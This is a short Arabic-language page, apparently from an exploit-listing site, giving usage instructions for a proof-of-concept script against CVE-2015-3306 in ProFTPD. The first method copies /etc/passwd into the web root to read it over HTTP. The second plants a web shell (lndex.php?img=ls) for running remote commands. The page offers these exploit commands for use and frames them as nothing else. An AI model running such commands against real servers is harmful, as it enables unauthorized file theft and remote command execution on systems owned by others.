## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XYK0X-CPX_PROFTPD
# cpx_proftpd
إثبات استغلال (PoC) من دانيال ألدانا لثغرة CVE-2015-3306. تم الإبلاغ عن الخطأ بواسطة فاديم ميليخوف.
###الطريقة 1:
الاستخدام:
root@kitploit:~
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
مثال:
root@kitploit:~
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
ثم جرّب:
root@kitploit:~
http://127.0.0.1/pass.txt
###الطريقة 2:
الاستخدام:
root@kitploit:~
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
مثال:
root@kitploit:~
python cpx_proftp.py 127.0.0.1 /var/www/html
ثم جرّب:
root@kitploit:~
http://127.0.0.1/lndex.php?img=ls